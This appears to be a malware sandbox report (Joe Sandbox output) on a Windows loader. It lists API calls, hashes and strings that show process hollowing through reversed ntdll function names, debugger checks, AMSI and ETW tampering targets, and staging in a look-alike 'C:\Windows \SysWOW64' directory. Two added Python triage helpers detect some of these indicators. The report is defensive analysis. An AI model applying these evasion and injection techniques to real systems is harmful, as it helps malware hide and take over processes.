                                                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E15B94
                                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02E15BA1
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02E15BA7
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 02E15BD2
                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02E15C19
                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02E15C29
                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02E15C51
                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02E15C61
                                                                                                                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02E15C87
                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02E15C97
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                        • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                        • API String ID: 1759228003-3917250287
                                                                                                                                        • Opcode ID: 41f75e94fb55a26f3a990ea112603149f0cc2d8c2e9d08b8adb20703b6215080
                                                                                                                                        • Instruction ID: bb5cc2be2946d4b9e3b01ee5d5239305f1020c3f82a6dcff5fa377f311f7d7d0
                                                                                                                                        • Opcode Fuzzy Hash: 41f75e94fb55a26f3a990ea112603149f0cc2d8c2e9d08b8adb20703b6215080
                                                                                                                                        • Instruction Fuzzy Hash: C1518771A8020C7EFB25DAA4CC46FEF77AD9B44744F8091B5B708EA181E7B49A44CF60

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E27A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                        • API String ID: 1888340430-445027087
                                                                                                                                        • Opcode ID: 0adc997cb0c09c2efd3210dcbc009560a22e64ee69ac7d1e0f249e26705db2d2
                                                                                                                                        • Instruction ID: ebd945c3e9eb873653f276364f24392af2ca45ed6094e973b45925953fd43513
                                                                                                                                        • Opcode Fuzzy Hash: 0adc997cb0c09c2efd3210dcbc009560a22e64ee69ac7d1e0f249e26705db2d2
                                                                                                                                        • Instruction Fuzzy Hash: 36112175690308BFEB00EFA4DC51EAEB7EDEB48710F519460B905D7640DA30AA59CB60

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02E27A1F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocateHandleMemoryModuleVirtual
                                                                                                                                        • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                                        • API String ID: 1888340430-445027087
                                                                                                                                        • Opcode ID: 808b7721f99e60617e20aab514301f85c1a6f3d8ca78fc14b4a66fa243d11cc1
                                                                                                                                        • Instruction ID: a9b03dca6d854b7a176a149af24b73a620721dac4b363d3fb6c728da96c75289
                                                                                                                                        • Opcode Fuzzy Hash: 808b7721f99e60617e20aab514301f85c1a6f3d8ca78fc14b4a66fa243d11cc1
                                                                                                                                        • Instruction Fuzzy Hash: 781144756D0308BFEB00EF94DC51EAEB7EDEB48710F51D460B905D7640DA30AA59CB60

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E282BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleMemoryModuleReadVirtual
                                                                                                                                        • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                                        • API String ID: 36784810-737317276
                                                                                                                                        • Opcode ID: c05521f4a5e623697260cf96fe1a41a879ad9cbb2820a37d454b6ce894d9828d
                                                                                                                                        • Instruction ID: 0c9249cd1e2d404d7cbd7e39a88eae17109c8966058523b811f532b84ff58e14
                                                                                                                                        • Opcode Fuzzy Hash: c05521f4a5e623697260cf96fe1a41a879ad9cbb2820a37d454b6ce894d9828d
                                                                                                                                        • Instruction Fuzzy Hash: ED012975690308BFEB00EFA8D841EAE77EEEB49710F52D420F909D7640D670AD198B74

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E27D6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleMemoryModuleVirtualWrite
                                                                                                                                        • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                                        • API String ID: 1525300337-3542721025
                                                                                                                                        • Opcode ID: e75cc00427f3edcbc6795a62ac425a9ffad701f955f454e2f27441418f2b0a16
                                                                                                                                        • Instruction ID: e145c2b4d2c62c8f3b1567e9f908f4c6e7c13b635e8f7b3ee938eb70077d03d7
                                                                                                                                        • Opcode Fuzzy Hash: e75cc00427f3edcbc6795a62ac425a9ffad701f955f454e2f27441418f2b0a16
                                                                                                                                        • Instruction Fuzzy Hash: 340140746D0208BFEB00EF98D842EAEB7EDEB4E710F51D460F809D7680C630A918CB64
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E28018: GetModuleHandleA.KERNELBASE(?), ref: 02E2806A
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E28113
                                                                                                                                          • Part of subcall function 02E280C0: GetProcAddress.KERNEL32(?,?), ref: 02E28125
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 02E28521
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModuleSectionUnmapView
                                                                                                                                        • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                                        • API String ID: 858119152-2520021413
                                                                                                                                        • Opcode ID: ab58ed5e71db49522843adc2fd6eff8a9511e0faa5e8c2d75e8f65d4522aa52a
                                                                                                                                        • Instruction ID: 5c73ed095a8adf169c01a9ee9e1170122fc754ad6e1f7182a489e31ed7619e98
                                                                                                                                        • Opcode Fuzzy Hash: ab58ed5e71db49522843adc2fd6eff8a9511e0faa5e8c2d75e8f65d4522aa52a
                                                                                                                                        • Instruction Fuzzy Hash: 1F0167746D0314BFEB00EF64DC41E5E77AEEB49710F92D460B4059B640DA34A909CA20
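The two resolver entries above obtain NtWriteVirtualMemory and NtUnmapViewOfSection through GetModuleHandleA/GetProcAddress, but the names they pass are stored reversed in the binary ("yromeMlautriVetirW", "noitceSfOweiVpamnUtN"), so a plain string scan for injection APIs finds nothing. The following is an added triage helper, not code from the sample or from Joe Sandbox: it un-reverses strings that only become ntdll-style export names when read backwards and reports whether the unmap-plus-write pair that characterises process hollowing is present. DUMP_STRINGS is copied from the String IDs above; INJECTION_APIS and the Nt/Zw/Rtl/Ldr prefix heuristic are assumptions.

```python
"""Un-reverse API names stored backwards and flag process-hollowing primitives.

Added triage example (not code from the sample or from Joe Sandbox). The
strings in DUMP_STRINGS are copied from this report; INJECTION_APIS is an
assumed watch-list and the Nt/Zw/Rtl/Ldr prefix heuristic is an assumption.
"""
import re

# Copied from the String IDs of the two GetProcAddress-based resolver calls above.
DUMP_STRINGS = ["Ntdll", "yromeMlautriVetirW", "noitceSfOweiVpamnUtN", "ntdll", "Kernel32"]

# Assumed watch-list: exports that together implement hollowing / injection.
INJECTION_APIS = {
    "NtUnmapViewOfSection": "unmap the target's image",
    "NtWriteVirtualMemory": "write into a foreign process",
    "WriteVirtualMemory": "write into a foreign process (Nt prefix added at runtime)",
    "NtMapViewOfSection": "map a section into the target",
    "NtCreateSection": "create a section to share with the target",
    "VirtualAllocEx": "allocate in a foreign process",
    "NtAlertResumeThread": "resume the hollowed thread",
}
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
NT_EXPORT = re.compile(r"^(Nt|Zw|Rtl|Ldr)[A-Z]")   # ntdll export naming, assumed


def decode_reversed(strings):
    """Map each string that only becomes an API name when reversed to that name."""
    decoded = {}
    for s in strings:
        if not IDENTIFIER.match(s):
            continue
        r = s[::-1]
        if r in INJECTION_APIS or "Nt" + r in INJECTION_APIS or NT_EXPORT.match(r):
            decoded[s] = r
    return decoded


def hollowing_indicators(strings):
    """Return (decoded names, matched primitives, hollowing verdict) for a string list."""
    decoded = decode_reversed(strings)
    resolved = {decoded.get(s, s) for s in strings}
    found = {name: why for name, why in INJECTION_APIS.items() if name in resolved}
    # Unmapping the target image and then writing into the process is the
    # hollowing signature; either spelling of WriteVirtualMemory counts.
    hollowing = "NtUnmapViewOfSection" in found and bool(
        set(found) & {"NtWriteVirtualMemory", "WriteVirtualMemory"})
    return decoded, found, hollowing


if __name__ == "__main__":
    decoded, found, hollowing = hollowing_indicators(DUMP_STRINGS)
    for rev, plain in decoded.items():
        print(f"{rev!r:26} -> {plain}")
    for name, why in found.items():
        print(f"primitive {name}: {why}")
    print("process hollowing:", hollowing)
```

Run against the strings of this dump it decodes both names and returns a positive hollowing verdict; the same reversal is used for module names elsewhere in this report ("lld.SLITUTEN", "sys.thgiseurt"), which the identifier filter deliberately skips because they are file names rather than exports.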
                                                                                                                                        APIs
                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DB03
                                                                                                                                        • NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02E2DB6A
                                                                                                                                        • NtClose.NTDLL(?), ref: 02E2DB73
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$CloseFileNameName_Write
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1792072161-0
                                                                                                                                        • Opcode ID: 6ce59a2a09d5b7a40936d0b5e679d5cb04f227f62d4d909601869c93a329a68b
                                                                                                                                        • Instruction ID: afcfb36519226fc7c2b3e830e6b2bc67cab0962f215e92a4aad06c01fe8c23c6
                                                                                                                                        • Opcode Fuzzy Hash: 6ce59a2a09d5b7a40936d0b5e679d5cb04f227f62d4d909601869c93a329a68b
                                                                                                                                        • Instruction Fuzzy Hash: 4B21FF71A80359BAEB10EAE4CC52FDEB7BDEB04B04F609471B605F71C0D7B0AE048A65
                                                                                                                                        APIs
                                                                                                                                        • RtlInitUnicodeString.NTDLL ref: 02E2DA64
                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02E2DA7A
                                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 02E2DA99
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$DeleteFileInitNameName_StringUnicode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1459852867-0
                                                                                                                                        • Opcode ID: 2761b2eb94208179999a5555419cced18572b9503af36920c5002c931c0c0520
                                                                                                                                        • Instruction ID: b9674dbd3f3512df930de0f02ad2ccce49f1b2d66a733a28640d95a343b81d80
                                                                                                                                        • Opcode Fuzzy Hash: 2761b2eb94208179999a5555419cced18572b9503af36920c5002c931c0c0520
                                                                                                                                        • Instruction Fuzzy Hash: 32014FB59883486EEF05E6A08D41FCD77B9AB44704F5090A2A302E6181DA74AB0CCB21
                                                                                                                                        APIs
                                                                                                                                        • RtlInitUnicodeString.NTDLL ref: 02E2DA64
                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02E2DA7A
                                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 02E2DA99
                                                                                                                                          • Part of subcall function 02E14C0C: SysFreeString.OLEAUT32(?), ref: 02E14C1A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PathString$DeleteFileFreeInitNameName_Unicode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2256775434-0
                                                                                                                                        • Opcode ID: a1fd5c7d40c89f01cdddffb5342bf04af208d6cfcd4117bd806c6f0753cd0595
                                                                                                                                        • Instruction ID: 99e16792973d9a1f0885bb5d52b273e71f0993ed09464414e315c40999a66328
                                                                                                                                        • Opcode Fuzzy Hash: a1fd5c7d40c89f01cdddffb5342bf04af208d6cfcd4117bd806c6f0753cd0595
                                                                                                                                        • Instruction Fuzzy Hash: EA01E575944208AADF11EAE4CD41FCE77BDDB44700F509571B602E6180EA74AB088A64
                                                                                                                                        APIs
                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DBE3
                                                                                                                                        • NtClose.NTDLL(?), ref: 02E2DC5D
                                                                                                                                          • Part of subcall function 02E14C0C: SysFreeString.OLEAUT32(?), ref: 02E14C1A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$CloseFreeNameName_String
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 11680810-0
                                                                                                                                        • Opcode ID: 01181605a0ec2b17026ef0636c49ba40ed01616f58711d5febc64f843b61edae
                                                                                                                                        • Instruction ID: 3443880434e59c52ddd08731719b025c3813b58792d8da230d432bc8bb26f569
                                                                                                                                        • Opcode Fuzzy Hash: 01181605a0ec2b17026ef0636c49ba40ed01616f58711d5febc64f843b61edae
                                                                                                                                        • Instruction Fuzzy Hash: C621D371A80318BAEB11EAE4CC46FEE77BDAB08700F505471B705F71C0D6B4AA058B65
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02E2881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02E28903), ref: 02E28860
                                                                                                                                          • Part of subcall function 02E2881C: GetProcAddress.KERNEL32(02E71384,00000000), ref: 02E28879
                                                                                                                                          • Part of subcall function 02E2881C: FreeLibrary.KERNEL32(02E71384,00000000,02E71388,Function_000055D8,00000004,02E71398,02E71388,000186A3,00000040,02E7139C,02E71384,00000000,00000000,00000000,00000000,02E28903), ref: 02E288E3
                                                                                                                                          • Part of subcall function 02E2EB8C: GetModuleHandleW.KERNEL32(KernelBase,?,02E2EF90,UacInitialize,02E6CF00,02E3AFD0,UacScan,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanString), ref: 02E2EB92
                                                                                                                                          • Part of subcall function 02E2EB8C: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E2EBA4
                                                                                                                                          • Part of subcall function 02E2EBE8: GetModuleHandleW.KERNEL32(KernelBase), ref: 02E2EBF8
                                                                                                                                          • Part of subcall function 02E2EBE8: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E2EC0A
                                                                                                                                          • Part of subcall function 02E2EBE8: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E2EC21
                                                                                                                                          • Part of subcall function 02E1C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02F658C8,?,02E2FBF6,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession), ref: 02E1C2FB
                                                                                                                                          • Part of subcall function 02E2DBA8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DBE3
                                                                                                                                          • Part of subcall function 02E2DBA8: NtClose.NTDLL(?), ref: 02E2DC5D
                                                                                                                                          • Part of subcall function 02E17E34: GetFileAttributesA.KERNEL32(00000000,?,02E32A41,ScanString,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,Initialize), ref: 02E17E3F
                                                                                                                                          • Part of subcall function 02E2DAC4: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02E2DB03
                                                                                                                                          • Part of subcall function 02E2DAC4: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02E2DB6A
                                                                                                                                          • Part of subcall function 02E2DAC4: NtClose.NTDLL(?), ref: 02E2DB73
                                                                                                                                          • Part of subcall function 02E28798: LoadLibraryW.KERNEL32(?,?), ref: 02E287AC
                                                                                                                                          • Part of subcall function 02E28798: GetProcAddress.KERNEL32(02E71390,BCryptVerifySignature), ref: 02E287C6
                                                                                                                                          • Part of subcall function 02E28798: FreeLibrary.KERNEL32(02E71390,02E71390,BCryptVerifySignature,bcrypt,?,02E713D0,00000000,02E713A4,02E2A3BF,ScanString,02E713A4,02E2A774,ScanBuffer,02E713A4,02E2A774,Initialize), ref: 02E28802
                                                                                                                                          • Part of subcall function 02E28704: LoadLibraryW.KERNEL32(amsi), ref: 02E2870D
                                                                                                                                          • Part of subcall function 02E28704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E2876C
                                                                                                                                        • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,ScanBuffer,02E6CF00,02E3AFD0,OpenSession,02E6CF00,02E3AFD0,02E3B328), ref: 02E349AF
                                                                                                                                          • Part of subcall function 02E2DA3C: RtlInitUnicodeString.NTDLL ref: 02E2DA64
                                                                                                                                          • Part of subcall function 02E2DA3C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02E2DA7A
                                                                                                                                          • Part of subcall function 02E2DA3C: NtDeleteFile.NTDLL(?), ref: 02E2DA99
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02E34BAF
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 02E34C05
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.23065524959.0000000002E11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E11000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_2e11000_Oupzhkpr.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePath$Library$AddressModuleNameProc$FreeHandleName_$CloseLoadMove$AttributesCheckDebuggerDeleteInitPresentRemoteSleepStringUnicodeWrite
                                                                                                                                         • String ID: .url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                        • API String ID: 4208238443-2905671141
                                                                                                                                        • Opcode ID: 38d602b386972f8e6903c0388002d2e8fd780f03a9d013388f269c4a78e53585
                                                                                                                                        • Instruction ID: 46cf618453b60b30ca894a40d12a428ed7e2572a680394807f9f101e8f7b2059
                                                                                                                                        • Opcode Fuzzy Hash: 38d602b386972f8e6903c0388002d2e8fd780f03a9d013388f269c4a78e53585
                                                                                                                                        • Instruction Fuzzy Hash: C4240975A801998FDB11EB64DD84ADE73F6AF84304F64E0B5F04AA7358DA70AE85CF10
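The String IDs of this routine contain the loader's staging layout: executables renamed to .pif under the world-writable C:\Users\Public, and a directory "C:\Windows \SysWOW64\" whose first component carries a trailing space so that it shadows the real system directory (the DLL search-order hijack the Sigma rule in this report refers to). The following is an added triage helper, not code from the sample or from Joe Sandbox: it walks a string list and flags directory components that differ from a system directory only by trailing spaces or dots, plus executables dropped under C:\Users\Public. DUMP_PATHS is copied from the String IDs above; SYSTEM_DIRS and the extension list are assumptions.

```python
"""Flag staging paths that imitate Windows system directories.

Added triage example (not code from the sample or from Joe Sandbox). DUMP_PATHS
is copied from the String IDs above; SYSTEM_DIRS and STAGING_EXTS are
assumptions about what is worth flagging.
"""

# Copied from the report; some entries appear there with doubled backslashes.
DUMP_PATHS = [
    "C:\\Windows\\System32\\",
    "C:\\\\Users\\\\Public\\\\Libraries\\\\",
    "C:\\\\Windows \\\\SysWOW64\\\\",
    "C:\\\\Windows \\\\SysWOW64\\\\svchost.exe",
    "C:\\Users\\Public\\aken.pif",
    "C:\\Users\\Public\\alpha.pif",
]

SYSTEM_DIRS = {"windows", "system32", "syswow64", "program files"}  # assumed watch-list
STAGING_EXTS = (".pif", ".com", ".scr", ".exe", ".bat", ".cmd")   # assumed


def components(path):
    """Collapse the doubled backslashes the report shows and split on the separator."""
    return path.replace("\\\\", "\\").split("\\")


def mimic_paths(strings):
    """Find directory components that differ from a system directory only by trailing spaces or dots.

    Win32 path normalisation strips those characters, so 'C:\\Windows \\' can only be
    created through a '\\\\?\\'-prefixed path and looks like the real C:\\Windows to most
    tools. Returns (string as seen, offending component, directory it shadows).
    """
    hits = []
    for s in strings:
        parts = components(s)
        for part in parts[:-1]:                  # skip the final file-name component
            canonical = part.rstrip(" .")
            if canonical != part and canonical.lower() in SYSTEM_DIRS:
                hits.append((s, part, canonical))
                break
    return hits


def public_staging(strings, exts=STAGING_EXTS):
    """Executables dropped under the world-writable C:\\Users\\Public tree."""
    out = []
    for s in strings:
        parts = [p.lower() for p in components(s)]
        if parts[:3] == ["c:", "users", "public"] and parts[-1].endswith(exts):
            out.append(s)
    return out


if __name__ == "__main__":
    for seen, part, shadows in mimic_paths(DUMP_PATHS):
        print(f"look-alike dir {part!r} (shadows {shadows}) in {seen}")
    for p in public_staging(DUMP_PATHS):
        print("staged executable:", p)
```

On the strings of this dump the look-alike check fires twice (the directory itself and the svchost.exe copy placed in it) and the staging check returns the two .pif files. When hunting for the directory on a host, remember that a plain listing of C:\Windows goes through Win32 normalisation and shows the genuine directory; enumerate with a `\\?\`-prefixed literal path or from a raw file-system view to see the one with the trailing space.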

                                                                                                                                         Control-flow Graph

                                                                                                                                         • Executed
                                                                                                                                         • Not Executed
